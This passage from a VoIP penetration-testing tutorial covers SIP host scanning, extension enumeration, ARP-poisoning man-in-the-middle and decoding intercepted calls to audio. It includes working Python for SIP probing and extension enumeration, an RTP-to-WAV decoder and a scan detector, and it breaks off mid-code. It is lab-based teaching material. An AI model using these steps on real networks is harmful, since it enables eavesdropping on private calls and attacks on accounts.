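    _sample("ACK sip:callee@lab.example SIP/2.0", "1 ACK"),
    _sample("BYE sip:caller@lab.example SIP/2.0", "2 BYE"),
    _sample("SIP/2.0 200 OK", "2 BYE"),
]

if __name__ == "__main__":
    for m in SAMPLE_CALL:
        print(m.method, m.status, m.response_class)
    print("issues:", check_call_flow(SAMPLE_CALL) or "none")
```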

Attack Vectors

Before we get started with the tools let’s have a look at some common VoIP attack

vectors:

Information Gathering, Footprinting and Enumeration.

Monitoring Traffic and eavesdropping Phone calls.

Attacking Authentication.

VLAN Hopping.

Denial of Service / Flooding.

Spoofing Caller ID.

In order to test the tools I have set up a TRIXBOX PBX system and created 6 extensions. I will be using two soft phones: one is a Linux based client called Twinkle and the second is a Windows based client called X-Lite. I will be using the latest and greatest release of Backtrack Linux, which is R2. You can find most of the VoIP attack tools in Backtrack under the "/pentest/voip/" directory:

root@bt:~# cd /pentest/voip/
root@bt:/pentest/voip#

Or you can simply navigate using the KDE menu to the "Backtrack" → "Voice Over IP" submenus:

Information Gathering

This phase is where we gather information about the topology, servers and clients, learning as much as we can in order to launch a successful attack. What we are interested in finding is live hosts, PBX type and version, VoIP servers/gateways, client (hardware and software) types and versions, etc. Instead of enumerating "usernames" we will be enumerating SIP extensions. Let's take a look at some of the tools available in Backtrack to help us find, identify and enumerate VoIP enabled devices.

SMAP

Backtrack includes a great tool called SMAP, which is a simple scanner for SIP enabled devices. SMAP sends off various SIP requests and awaits responses from SIP enabled DSL routers, proxies and user agents. It could be considered a mash-up of NMAP and sipsak.

SMAP Usage:

root@bt:/pentest/voip/smap# ./smap

smap 0.6.0 http://www.wormulon.net/

usage: smap [ Options ]

  -h: this help
  -d: increase debugging
  -o: enable fingerprinting
  -O: enable more verbose fingerprinting
  -l: fingerprint learning mode
  -t: TCP transport
  -u: UDP transport (default
  -P0: Treat all hosts as online - skip host discovery
  -p : destination port
  -r : messages per second rate limit
  -D : SIP domain to use without leading sip:
  -w : timeout in msec

Scanning a single host:

root@bt:/pentest/voip/smap# ./smap 192.168.1.104

smap 0.6.0 http://www.wormulon.net/

192.168.1.104: ICMP reachable, SIP enabled

1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

Scanning a range of IP addresses:

root@bt:/pentest/voip/smap# ./smap 192.168.1.130/24

smap 0.6.0 http://www.wormulon.net/

192.168.1.20: ICMP reachable, SIP enabled
192.168.1.22: ICMP reachable, SIP enabled
192.168.1.0: ICMP unreachable, SIP disabled
192.168.1.1: ICMP unreachable, SIP disabled
192.168.1.2: ICMP unreachable, SIP disabled
192.168.1.3: ICMP unreachable, SIP disabled
----EDIT---
192.168.1.250: ICMP unreachable, SIP disabled
192.168.1.251: ICMP unreachable, SIP disabled
192.168.1.252: ICMP unreachable, SIP disabled
192.168.1.253: ICMP unreachable, SIP disabled
192.168.1.254: ICMP unreachable, SIP disabled
192.168.1.255: ICMP unreachable, SIP disabled

256 hosts scanned, 7 ICMP reachable, 2 SIP enabled (0.8%)

Now that we have identified SIP enabled hosts we can use SMAP to fingerprint the server/client type and version:

root@bt:/pentest/voip/smap# ./smap -O 192.168.1.104

smap 0.6.0 http://www.wormulon.net/

192.168.1.104: ICMP reachable, SIP enabled
best guess (70% sure) fingerprint: Asterisk PBX SVN-trunk-r56579
 User-Agent: Asterisk PBX

1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

In case SMAP could not fingerprint our host, we use the -l argument to put it in learning mode, which provides some useful information:

root@bt:/pentest/voip/smap# ./smap -l 192.168.1.104

smap 0.6.0 http://www.wormulon.net/

NOTICE: test_accept: "Accept: application/sdp"
NOTICE: test_allow: "Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY"
NOTICE: test_supported: "Supported: replaces"
NOTICE: test_via: transport capitalization: 2
NOTICE: test_via: "branch;alias;received;rport"
NOTICE: test_via: Please add new cmpstr
NOTICE: test_via: transport capitalization: 2
192.168.1.104: ICMP reachable, SIP enabled
best guess (70% sure) fingerprint: Asterisk PBX SVN-trunk-r56579
FINGERPRINT information:
newmethod=501
accept_class=2
allow_class=201
supported_class=8
via_class=2
hoe_class=ignore
options=200
brokenfromto=404
prack=481
ping=501
invite=200
 User-Agent: Asterisk PBX

1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

Another useful feature of SMAP is the -d argument, which enables debug output for verbosity; try using -o along with it to view the fingerprinting process in detail.

root@bt:/pentest/voip/smap# ./smap -d 192.168.1.104

smap 0.6.0 http://www.wormulon.net/

DEBUG: local IP: 212.235.66.182
DEBUG: local IP: 212.235.66.182
DEBUG: bind() successful
DEBUG: RAW socket open
DEBUG: moving 1 from S_START to S_PING
DEBUG: ICMP error Echo Reply
DEBUG: 192.168.1.104/1 request: SIP OPTIONS request (valid)
DEBUG: response belongs to task 1 (192.168.1.104)
DEBUG: ACK: ACK sip:localhost SIP/2.0
Via: SIP/2.0/UDP 212.235.66.182:12345;branch=z9hG4bK.56689;alias;received=192.168.1.105;rport=5060
From: ;tag=6b9ae50e67345d3b
To: ;tag=as14262fec
Call-ID: [email protected]
CSeq: 23915 ACK
Content-Length: 0
User-Agent: smap 0.6.0
--- end of ACK--
192.168.1.104: ICMP reachable, SIP enabled
DEBUG: destroying task 1

1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)
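From the defender's side, a sweep like the SMAP runs above (one source sending OPTIONS to every address of a /24 within seconds) stands out in traffic summaries. The following Python is an added example, not part of the article or of SMAP: it slides a time window over per-source SIP request records and flags a source that probed many distinct hosts in a short time, while leaving a PBX's periodic OPTIONS keep-alives to its trunks alone. The records are constructed tuples; a sensor or flow log feeding it real data is assumed.

```python
"""Detect SIP host sweeps (smap / sip-scan style) in a request summary.

Added example, not from the original article. Records are constructed
(timestamp, src_ip, dst_ip, method) tuples; in practice they would come from
a SIP-aware sensor or a flow log.
"""
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

Record = Tuple[float, str, str, str]        # (unix time, src_ip, dst_ip, method)
Alert = Tuple[str, float, int]              # (src_ip, window start, distinct targets)


def detect_sip_sweeps(records: Iterable[Record], window_s: float = 60.0,
                      min_targets: int = 8, methods=("OPTIONS",)) -> List[Alert]:
    """Flag sources that sent `methods` requests to at least `min_targets`
    distinct destinations within any `window_s` seconds (sliding window)."""
    by_src: Dict[str, List[Tuple[float, str]]] = defaultdict(list)
    for ts, src, dst, method in records:
        if method in methods:
            by_src[src].append((ts, dst))
    alerts: List[Alert] = []
    for src, events in by_src.items():
        events.sort()
        in_window: Dict[str, int] = defaultdict(int)   # dst -> hits inside window
        left = 0
        for ts, dst in events:
            in_window[dst] += 1
            while ts - events[left][0] > window_s:      # expire events older than the window
                old = events[left][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            if len(in_window) >= min_targets:
                alerts.append((src, events[left][0], len(in_window)))
                break                                   # one alert per source is enough
    return alerts


def build_sample_records() -> List[Record]:
    """Constructed traffic: one scanner, one PBX doing keep-alives, one phone."""
    t0 = 1_700_000_000.0
    recs: List[Record] = []
    # a host probing all 256 addresses of 192.168.1.0/24 within ~5 s, as smap does
    recs += [(t0 + i * 0.02, "192.168.1.105", f"192.168.1.{i}", "OPTIONS") for i in range(256)]
    # a PBX qualifying its two trunks every 30 s: repeated OPTIONS, but only 2 targets
    for k in range(10):
        recs.append((t0 + k * 30, "192.168.1.104", "192.168.1.20", "OPTIONS"))
        recs.append((t0 + k * 30, "192.168.1.104", "192.168.1.22", "OPTIONS"))
    # a phone registering with the PBX
    recs.append((t0 + 1, "192.168.1.102", "192.168.1.104", "REGISTER"))
    return recs


if __name__ == "__main__":
    for src, start, n in detect_sip_sweeps(build_sample_records()):
        print(f"sweep from {src}: {n} distinct SIP targets within 60 s starting at {start:.0f}")
```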

SIPSAK

SIPSAK is used for testing SIP enabled applications and devices using the OPTIONS request method only. We can use it for fingerprinting and enumeration. You won't find sipsak in the "/pentest/voip/" directory; you can execute it from any location by simply typing sipsak.

root@bt:~# sipsak
sipsak 0.9.6 by Nils Ohlmeier
  Copyright (C) 2002-2004 FhG Fokus
  Copyright (C) 2004-2005 Nils Ohlmeier
  report bugs to [email protected]

  shoot  : sipsak [-f FILE] [-L] -s SIPURI
  trace  : sipsak -T -s SIPURI
  usrloc : sipsak -U [-I|M] [-b NUMBER] [-e NUMBER] [-x NUMBER] [-z NUMBER] -s SIPURI
  usrloc : sipsak -I|M [-b NUMBER] [-e NUMBER] -s SIPURI
  usrloc : sipsak -U [-C SIPURI] [-x NUMBER] -s SIPURI
  message: sipsak -M [-B STRING] [-O STRING] [-c SIPURI] -s SIPURI
  flood  : sipsak -F [-e NUMBER] -s SIPURI
  random : sipsak -R [-t NUMBER] -s SIPURI

  additional parameter in every mode:
     [-a PASSWORD] [-d] [-i] [-H HOSTNAME] [-l PORT] [-m NUMBER] [-n] [-N]
     [-r PORT] [-v] [-V] [-w]

  -h           displays this help message
  -V           prints version string only
  -f FILE      the file which contains the SIP message to send
                 use - for standard input
  -L           de-activate CR (\r) insertion in files
  -s SIPURI    the destination server uri in form
                 sip:[user@]servername[:port]
  -T           activates the traceroute mode
  -U           activates the usrloc mode
  -I           simulates a successful calls with itself
  -M           sends messages to itself
  -C SIPURI    use the given uri as Contact in REGISTER
  -b NUMBER    the starting number appendix to the user name (default: 0)
  -e NUMBER    the ending numer of the appendix to the user name
  -o NUMBER    sleep number ms before sending next request
  -x NUMBER    the expires header field value (default: 15)
  -z NUMBER    activates randomly removing of user bindings
  -F           activates the flood mode
  -R           activates the random modues (dangerous)
  -t NUMBER    the maximum number of trashed character in random mode
                 (default: request length)
  -l PORT      the local port to use (default: any)
  -r PORT      the remote port to use (default: 5060)
  -p HOSTNAME  request target (outbound proxy)
  -H HOSTNAME  overwrites the local hostname in all headers
  -m NUMBER    the value for the max-forwards header field
  -n           use FQDN instead of IPs in the Via-Line
  -i           deactivate the insertion of a Via-Line
  -a PASSWORD  password for authentication (if omitted password="")
  -u STRING    Authentication username
  -d           ignore redirects
  -v           each v produces more verbosity (max. 3)
  -w           extract IP from the warning in reply
  -g STRING    replacement for a special mark in the message
  -G           activates replacement of variables
  -N           returns exit codes Nagios compliant
  -q STRING    search for a RegExp in replies and return error on failure
  -W NUMBER    return Nagios warning if retrans > number
  -B STRING    send a message with string as body
  -O STRING    Content-Disposition value
  -P NUMBER    Number of processes to start
  -A NUMBER    number of test runs and print just timings
  -S           use same port for receiving and sending
  -c SIPURI    use the given uri as From in MESSAGE
  -D NUMBER    timeout multiplier for INVITE transactions and reliable transports
                 (default: 64)
  -E STRING    specify transport to be used
  -j STRING    adds additional headers to the request

Here is an example of using sipsak to fingerprint a SIP enabled device. We can see in the result that the device we queried is an Audiocodes MP-114 FXS gateway.

root@bt:~# sipsak -vv -s sip:192.168.1.221
message received:
SIP/2.0 200 OK
Via: SIP/2.0/UDP 127.0.1.1:51601;branch=z9hG4bK.18a1b21f;rport;alias
From: sip:[email protected]:51601;tag=97ac9e5
To: sip:192.168.1.221;tag=1c1785761661
Call-ID: [email protected]
CSeq: 1 OPTIONS
Contact: 
Supported: em,100rel,timer,replaces,path,resource-priority
Allow: REGISTER,OPTIONS,INVITE,ACK,CANCEL,BYE,NOTIFY,PRACK,REFER,INFO,SUBSCRIBE,UPDATE
Server: Audiocodes-Sip-Gateway-MP-114 FXS/v.5.40A.040.005
X-Resources: telchs=4/0;mediachs=0/0
Accept: application/sdp, application/simple-message-summary, message/sipfrag
Content-Type: application/sdp
Content-Length: 343

v=0
o=AudiocodesGW 1785763980 1785763858 IN IP4 192.168.1.221
s=Phone-Call
c=IN IP4 192.168.1.221
t=0 0
m=audio 6000 RTP/AVP 18 8 0 127
a=rtpmap:18 G729/8000
a=fmtp:18 annexb=no
a=rtpmap:8 PCMA/8000
a=rtpmap:0 PCMU/8000
a=rtpmap:127 telephone-event/8000
a=fmtp:127 0-15
a=ptime:20
a=sendrecv
a=rtcp:6001 IN IP4 192.168.1.221

** reply received after 67.923 ms **
SIP/2.0 200 OK
final received

SIPScan

Sip-scan is a simple scanner for SIP-enabled hosts; it can scan a single host or an entire subnet.

Sip-scan usage:

root@bt:/pentest/voip/sipscan# ./sip-scan --help
./sip-scan version [unknown] calling Getopt::Std::getopts (version 1.05),
running under Perl version 5.10.0.
Usage: sip-scan [options]
  -v        Be verbose.
  -i ip|if  Interface/IP for SIP-headers (default: IP from ppp0)
  -p port   remote port to scan. (default: 5060)
  -l port   local origin of packets. (default: 5060)
  -d n[p]   Wait n ms after each sent packet (default: 50ms) or if 'p' is given,
            send n packets per second (default: 20)
  -w n      Wait n ms for remaining answers (default: 2000ms)

Network spec contains the wildcard * or ranges n-m.

Scanning a subnet:

root@bt:/pentest/voip/sipscan# ./sip-scan -i eth0 192.168.1.1-254
192.168.1.20: Grandstream HT-502 V1.2A 1.0.1.35
192.168.1.21: Grandstream HT-502 V1.2A 1.0.1.35
192.168.1.22: Asterisk PBX
192.168.1.104: Asterisk PBX
192.168.1.128: FreeSWITCH-mod_sofia/1.0.trunk-16055
192.168.1.174: Grandstream HT-502 V1.2A 1.0.1.35
192.168.1.175: Asterisk PBX 1.6.0.9-samy-r27
192.168.1.219: "Exelmind Call-Control Switch (CCS)"
192.168.1.248: MailVision HostLynx/2.1 'GA'

SVMAP

SVMAP is part of a suite of tools called SIPVicious and is my scanner of choice. It can scan, identify and fingerprint a single IP or a range of IP addresses. Svmap lets you choose the request method used for scanning (the default is OPTIONS), offers debug and verbosity options, and can even look up the SIP SRV records of the destination domain. Use ./svmap.py -h to view all the available arguments.

root@bt:/pentest/voip/sipvicious# ./svmap.py
Usage: svmap.py [options] host1 host2 hostrange
examples:
svmap.py 10.0.0.1-10.0.0.255 \
> 172.16.131.1 sipvicious.org/22 10.0.1.1/24 \
> 1.1.1.1-20 1.1.2-20.* 4.1.*.*
svmap.py -s session1 --randomize 10.0.0.1/8
svmap.py --resume session1 -v
svmap.py -p5060-5062 10.0.0.3-20 -m INVITE

Scanning an IP range:

root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.1-254
| SIP Device         | User Agent    | Fingerprint |
----------------------------------------------------
| 192.168.1.104:5060 | Asterisk PBX  | disabled    |
| 192.168.1.103:5060 | Twinkle/1.4.2 | disabled    |

Enabling fingerprinting during the scan:

root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.1-254 --fp

Extensions Enumeration

Extension enumeration can aid an attacker by finding valid extensions on a

VoIP system which later can lead to a brute force attack on the SIP accounts.

Extension enumeration works by examining errors returned by a sip requests

methods like REGISTER, OPTIONS and INVITE 

Svwar

Svwar, another tool from the SIPVicious suite, enumerates extensions from a numeric range or a dictionary file. It supports all three of the enumeration methods mentioned above; the default method is REGISTER.

Usage:

root@bt:/pentest/voip/sipvicious# ./svwar.py
Usage: svwar.py [options] target
examples:
svwar.py -e100-999 10.0.0.1
svwar.py -d dictionary.txt 10.0.0.2

Example:

root@bt:/pentest/voip/sipvicious# ./svwar.py -e100-400 192.168.1.104
| Extension | Authentication |
------------------------------
| 201       | reqauth        |
| 200       | reqauth        |
| 203       | reqauth        |
| 202       | reqauth        |
| 303       | reqauth        |
| 305       | reqauth        |

Svwar has identified all the extensions I created on my Trixbox server. You can specify another SIP method with the -m argument, and add -v or -vv for verbosity.

root@bt:/pentest/voip/sipvicious# ./svwar.py -e100-400 192.168.1.104 -m INVITE -v
INFO:TakeASip:trying to get self ip .. might take a while
INFO:root:start your engines
INFO:TakeASip:Ok SIP device found
INFO:TakeASip:extension '200' exists - requires authentication
INFO:TakeASip:extension '201' exists - requires authentication
-----Edit----
INFO:TakeASip:extension '203' exists - requires authentication
INFO:TakeASip:extension '303' exists - requires authentication
INFO:TakeASip:extension '303' exists - requires authentication
INFO:TakeASip:extension '305' exists - requires authentication
INFO:root:we have 6 extensions
| Extension | Authentication |
------------------------------
| 201       | reqauth        |
| 200       | reqauth        |
| 203       | reqauth        |
| 202       | reqauth        |
| 303       | reqauth        |
| 305       | reqauth        |
INFO:root:Total time: 0:00:21.944731
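The following is an added example, written for this page and not code from the wiki, sipsak or SIPVicious. It shows the exchange behind both the sipsak OPTIONS fingerprint above and svwar's REGISTER enumeration: a minimal SIP request builder, a response parser that pulls out the Server/User-Agent header, and the existence verdict derived from the status code. LOCAL_IP is an assumption (the BackTrack box in this article's scenario), the embedded 200 OK is an abridged transcription of the sipsak reply above with the SDP body left out, and the status-code-to-verdict mapping is mine.

```python
"""SIP OPTIONS fingerprinting and REGISTER-based extension enumeration.

Added example for this page; not code from the BackTrack wiki, sipsak or
SIPVicious.  Standard library only.
"""
import random
import socket

LOCAL_IP = "192.168.1.105"   # assumption: the attacker's address in this scenario
LOCAL_PORT = 5060


def _rand_hex(n: int) -> str:
    return "".join(random.choices("0123456789abcdef", k=n))


def build_request(method: str, host: str, ext: str = "", port: int = 5060) -> bytes:
    """Build a minimal SIP request.

    OPTIONS/INVITE put the extension in the request URI; REGISTER addresses
    the domain and names the extension in To/From (what svwar's default does).
    """
    aor = f"sip:{ext}@{host}" if ext else f"sip:{host}"
    request_uri = f"sip:{host}:{port}" if method == "REGISTER" else f"{aor}:{port}"
    lines = [
        f"{method} {request_uri} SIP/2.0",
        f"Via: SIP/2.0/UDP {LOCAL_IP}:{LOCAL_PORT};branch=z9hG4bK{_rand_hex(8)};rport",
        f"From: <{aor}>;tag={_rand_hex(8)}",
        f"To: <{aor}>",
        f"Call-ID: {_rand_hex(16)}@{LOCAL_IP}",
        f"CSeq: 1 {method}",
        f"Contact: <sip:{ext or 'probe'}@{LOCAL_IP}:{LOCAL_PORT}>",
        "Max-Forwards: 70",
        "Content-Length: 0",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def parse_response(raw: bytes):
    """Split a SIP response into (status, reason, headers, body).

    Header names are lower-cased; a repeated header keeps every value.
    """
    text = raw.decode("utf-8", errors="replace")
    head, _, body = text.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    parts = status_line.split(" ", 2)
    if len(parts) < 2 or parts[0] != "SIP/2.0":
        raise ValueError(f"not a SIP response: {status_line!r}")
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return int(parts[1]), (parts[2] if len(parts) > 2 else ""), headers, body


def fingerprint(headers: dict) -> str:
    """What sipsak/svmap print: the Server header, else User-Agent."""
    for name in ("server", "user-agent"):
        if name in headers:
            return headers[name][0]
    return ""


def classify(status: int) -> str:
    """svwar-style verdict for one probed extension (mapping is my assumption).

    401/407 (challenge) and 200 (accepted without a password) both prove the
    extension exists; 404 proves it does not; 403 exists but is blocked.
    """
    if status in (401, 407):
        return "reqauth"
    if status == 200:
        return "noauth"
    if status == 404:
        return "none"
    if status == 403:
        return "forbidden"
    return f"unknown-{status}"


def enumerate_extensions(extensions, responder):
    """Return {extension: verdict} for every extension that appears to exist.

    responder(ext) sends the probe and returns the status code (None on
    timeout); it is injected so the logic can be exercised without a PBX.
    """
    found = {}
    for ext in extensions:
        status = responder(ext)
        if status is None:
            continue
        verdict = classify(status)
        if verdict in ("reqauth", "noauth", "forbidden"):
            found[ext] = verdict
    return found


def probe(host: str, method: str = "OPTIONS", ext: str = "", port: int = 5060,
          timeout: float = 2.0):
    """Send one request over UDP; return the parsed reply or None on timeout."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(build_request(method, host, ext, port), (host, port))
        data, _ = sock.recvfrom(65535)
    except socket.timeout:
        return None
    finally:
        sock.close()
    return parse_response(data)


# Abridged transcription of the sipsak reply shown above (SDP body omitted).
SAMPLE_200_OK = (
    b"SIP/2.0 200 OK\r\n"
    b"Via: SIP/2.0/UDP 127.0.1.1:51601;branch=z9hG4bK.18a1b21f;rport;alias\r\n"
    b"To: sip:192.168.1.221;tag=1c1785761661\r\n"
    b"CSeq: 1 OPTIONS\r\n"
    b"Supported: em,100rel,timer,replaces,path,resource-priority\r\n"
    b"Allow: REGISTER,OPTIONS,INVITE,ACK,CANCEL,BYE,NOTIFY,PRACK,REFER,INFO,SUBSCRIBE,UPDATE\r\n"
    b"Server: Audiocodes-Sip-Gateway-MP-114 FXS/v.5.40A.040.005\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    status, reason, headers, _ = parse_response(SAMPLE_200_OK)
    print(status, reason, fingerprint(headers))
    # Live use against the PBX of this article's scenario:
    #   print(probe("192.168.1.104"))
    #   enumerate_extensions(map(str, range(100, 401)),
    #       lambda e: (probe("192.168.1.104", "REGISTER", e) or [None])[0])
```

The verdict only means something if the server answers differently for known and unknown extensions. An Asterisk box with alwaysauthreject=yes in sip.conf challenges every REGISTER the same way, so svwar (and this code) will report every extension in the range as reqauth; compare the results of two methods before trusting a list.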

Enumiax

Enumiax enumerates usernames over the Inter-Asterisk eXchange protocol (IAX2, UDP port 4569). It supports a dictionary attack or sequential username guessing.

root@bt:/pentest/voip/enumiax# ./enumiax
enumIAX 1.0
Dustin D. Trammell
Usage: enumiax [options] target
options:
  -d    Dictionary attack using file
  -i    Interval for auto-save (# of operations, default 1000)
  -m #  Minimum username length (in characters)
  -M #  Maximum username length (in characters)
  -r #  Rate-limit calls (in microseconds)
  -s    Read session state from state file
  -v    Increase verbosity (repeat for additional verbosity)
  -V    Print version information and exit
  -h    Print help/usage information and exit

root@bt:/pentest/voip/enumiax# ./enumiax -v -m3 -M3 192.168.1.104
enumIAX 1.0
Dustin D. Trammell
Target Aquired: 192.168.1.104
Connecting to 192.168.1.104 via udp on port 4569...
Starting enum process at: Sat Feb 5 13:04:18 2011
Now working on 3 character usernames...
#################################
Trying username: "000"
#################################
Trying username: "001"
#################################
Trying username: "002"
#################################
Trying username: "003"
#################################
Trying username: "004"
#################################
Trying username: "005"
#################################
Trying username: "006"
#################################
Trying username: "007"
#################################
Trying username: "008"
#################################
...

root@bt:/pentest/voip/enumiax# ./enumiax -d dict -v 192.168.1.104
enumIAX 1.0
Dustin D. Trammell
Target Aquired: 192.168.1.104
Connecting to 192.168.1.104 via udp on port 4569...
Starting enum process at: Sat Feb 5 13:02:39 2011
#################################
Trying username: "guest"
#################################
Trying username: "iaxtel"
#################################
Trying username: "iaxtel2"
#################################
Trying username: "100"
#################################
Trying username: "101"
#################################
Trying username: "200"
#################################
Trying username: "201"
#################################
Trying username: "202"
#################################
Trying username: "203"
End of dictionary file reached, exiting.

Monitoring Traffic and Eavesdropping Phone calls

Monitoring VoIP traffic lets an attacker capture the SIP requests and RTP data exchanged between clients and server. It serves two attack vectors:

Capturing SIP authentication (we will discuss this later in the attacking authentication section).

Eavesdropping on users' phone calls.

For demonstration purposes we will use the following scenario: 

For this attack vector we will need to perform a Man in the Middle attack, which requires the following steps:

ARP poisoning/spoofing

Sniffing the traffic

Decoding the RTP data to an audio file.

Arp Poisoning using Arpspoof

Before we can sniff traffic we need to ARP poison the victim phone and its gateway so that their traffic passes through our machine. We'll be using a tool called arpspoof (part of dsniff), installed as /usr/sbin/arpspoof in BackTrack, so you can invoke it from anywhere by typing arpspoof. Before we can use arpspoof we need to enable IP forwarding, otherwise the intercepted packets are dropped and both victims lose connectivity (a very visible denial of service):

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward

Arpspoof syntax should look as follows:

root@bt:~# arpspoof
Version: 2.4
Usage: arpspoof [-i interface] [-t target] host

For a successful MITM attack we need to spoof both directions, so run two instances (add -i eth0 if the machine has more than one interface):

arpspoof -t victim gateway
arpspoof -t gateway victim

Stop each instance with Ctrl-C when you are done: arpspoof then sends correct ARP replies to restore the victims' caches, whereas killing it any other way leaves them poisoned.

We let the ARP poisoning run in the background while performing a capture with Wireshark.

Capturing traffic and Eavesdropping using Wireshark

Now let's fire up Wireshark to capture some traffic. We will use the following capture filter, which keeps only unicast traffic to or from the victim phone (192.168.1.118 in this scenario):

not broadcast and not multicast and host 192.168.1.118

Now let's start capturing some traffic. While we are sniffing, user "B" launches the X-Lite softphone on his desktop computer and dials user "A" at extension 200. Wireshark captures the traffic; after a while I stopped the capture and saved the session to a file called "sip.pcap".

We can see that we have captured the SIP traffic, but for this section we are more interested in the RTP traffic because it carries the actual conversation. Wireshark has a handy feature to decode captured VoIP calls into playable audio: you will find it under the Statistics -> VoIP Calls menu (select a call, open the Player, decode and play the streams). Wireshark can only play codecs it knows how to decode, such as the G.711 PCMU/PCMA the gateway above advertises.

VoIPong

VoIPong is a utility which detects all Voice over IP calls on a pipeline and, for those that are G.711 encoded, dumps the actual conversation to separate wave files. It supports SIP, H.323, Cisco's Skinny Client Protocol, RTP and RTCP. VoIPong is located in BackTrack's /pentest/voip/voipong directory. Before we can use VoIPong we need to make some changes to the voipong.conf file (the voipongnets file named by networksfile must list the networks VoIPong should watch):

root@bt:/pentest/voip/voipong# nano etc/voipong.conf
soxpath = /usr/bin/sox
networksfile = /pentest/voip/voipong/etc/voipongnets
outdir = /pentest/voip/voipong/output/
device = eth0 # your network interface card name

Now we can start VoIPong to capture VoIP conversations (-c names the config file, -d4 sets a verbose debug level and -f keeps it in the foreground):

root@bt:/pentest/voip/voipong# ./voipong -c etc/voipong.conf -d4 -f

Once VoIPong detects a phone call it starts capturing it; when the call ends VoIPong stops the capture and renders it to a playable wave file. All conversations are saved to the /pentest/voip/voipong/output folder.
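The decoding step that Wireshark's VoIP Calls player and VoIPong perform (and that vomit and UCSniff perform further below) is shown here as an added example, written for this page and not taken from the wiki or from any of those tools. It walks a pcap, picks out RTP packets carrying payload type 0 (PCMU, the G.711 µ-law the Audiocodes gateway above advertises as rtpmap:0), reorders them by sequence number per stream and writes 8 kHz 16-bit WAV files. Assumptions: classic pcap (not pcapng) with Ethernet framing and IPv4/UDP; the pcap embedded at the bottom is constructed in code, not a real capture.

```python
"""Decode G.711 PCMU (mu-law) RTP audio from a pcap into a WAV file.

Added example for this page; not code from the wiki, VoIPong, vomit or UCSniff.
Standard library only.  Classic pcap, Ethernet, IPv4/UDP assumed; PCMA
(payload type 8) would need an A-law table and is left out.
"""
import struct
import wave
from collections import defaultdict


def ulaw_to_linear(byte: int) -> int:
    """G.711 mu-law byte -> signed 16-bit PCM sample."""
    u = ~byte & 0xFF
    sign, exponent, mantissa = u & 0x80, (u >> 4) & 0x07, u & 0x0F
    sample = (((mantissa << 3) + 0x84) << exponent) - 0x84
    return -sample if sign else sample


ULAW_TABLE = [ulaw_to_linear(b) for b in range(256)]


def pcap_frames(data: bytes):
    """Yield the Ethernet frames stored in a classic pcap file."""
    (magic,) = struct.unpack("<I", data[:4])
    endian = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a classic pcap file (pcapng is not handled)")
    if struct.unpack(endian + "I", data[20:24])[0] != 1:
        raise ValueError("link type is not Ethernet")
    off = 24
    while off + 16 <= len(data):
        _sec, _usec, incl_len, _orig = struct.unpack(endian + "IIII", data[off:off + 16])
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def udp_payload(frame: bytes):
    """Ethernet/IPv4/UDP -> (src, sport, dst, dport, payload), else None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    if ip[0] >> 4 != 4 or ip[9] != 17:                 # IPv4 carrying UDP
        return None
    ihl = (ip[0] & 0x0F) * 4
    (total_len,) = struct.unpack("!H", ip[2:4])
    udp = ip[ihl:total_len]
    sport, dport, ulen, _cksum = struct.unpack("!HHHH", udp[:8])
    return ".".join(map(str, ip[12:16])), sport, ".".join(map(str, ip[16:20])), dport, udp[8:ulen]


def parse_rtp(payload: bytes):
    """RFC 3550 fixed header -> dict, or None if this is not RTP version 2."""
    if len(payload) < 12:
        return None
    b0, b1, seq, ts, ssrc = struct.unpack("!BBHII", payload[:12])
    if b0 >> 6 != 2:
        return None
    off = 12 + 4 * (b0 & 0x0F)                         # skip the CSRC list
    if b0 & 0x10:                                      # header extension present
        _profile, ext_words = struct.unpack("!HH", payload[off:off + 4])
        off += 4 + 4 * ext_words
    audio = payload[off:]
    if b0 & 0x20 and audio:                            # padding: last byte = pad length
        audio = audio[:len(audio) - audio[-1]]
    return {"pt": b1 & 0x7F, "marker": b1 >> 7, "seq": seq, "ts": ts, "ssrc": ssrc, "audio": audio}


def extract_pcmu_streams(pcap: bytes, ports=None):
    """{(src, sport, dst, dport, ssrc): [16-bit samples]} for every PCMU stream.

    `ports` restricts decoding to the UDP ports negotiated in the SDP m=audio
    lines (recommended on real captures: any UDP payload whose first two bits
    are 10 passes the RTP check).  Sequence wrap-around at 65535 is not handled.
    """
    streams = defaultdict(list)
    for frame in pcap_frames(pcap):
        info = udp_payload(frame)
        if info is None:
            continue
        src, sport, dst, dport, payload = info
        if ports and dport not in ports:
            continue
        rtp = parse_rtp(payload)
        if rtp is None or rtp["pt"] != 0:
            continue
        streams[(src, sport, dst, dport, rtp["ssrc"])].append((rtp["seq"], rtp["audio"]))
    return {key: [ULAW_TABLE[b] for _, chunk in sorted(chunks) for b in chunk]
            for key, chunks in streams.items()}


def write_wav(path: str, samples):
    """8 kHz, 16-bit, mono: what G.711 decodes to."""
    with wave.open(path, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(8000)
        w.writeframes(struct.pack(f"<{len(samples)}h", *samples))


# --- constructed sample capture (no real pcap from this page is reproduced) ---
def build_rtp_frame(src, sport, dst, dport, seq, audio, pt=0, ssrc=0xDEADBEEF):
    rtp = struct.pack("!BBHII", 0x80, pt, seq, seq * 160, ssrc) + audio
    udp = struct.pack("!HHHH", sport, dport, 8 + len(rtp), 0) + rtp
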